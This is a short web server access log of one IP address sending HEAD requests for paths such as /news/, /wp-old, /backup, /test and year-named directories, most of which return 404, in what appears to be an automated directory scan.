108.165.164.187 - - [18/Jan/2026:13:18:34 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/New" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:35 +0800] "HEAD /NEW HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:35 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/NEW" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:36 +0800] "HEAD /wp-old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:37 +0800] "HEAD /2022 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:38 +0800] "HEAD /2023 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:39 +0800] "HEAD /2024 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:40 +0800] "HEAD /2017 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:40 +0800] "HEAD /2020 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:41 +0800] "HEAD /2019 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:42 +0800] "HEAD /2018 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:43 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:44 +0800] "HEAD /test HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:45 +0800] "HEAD /Test HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
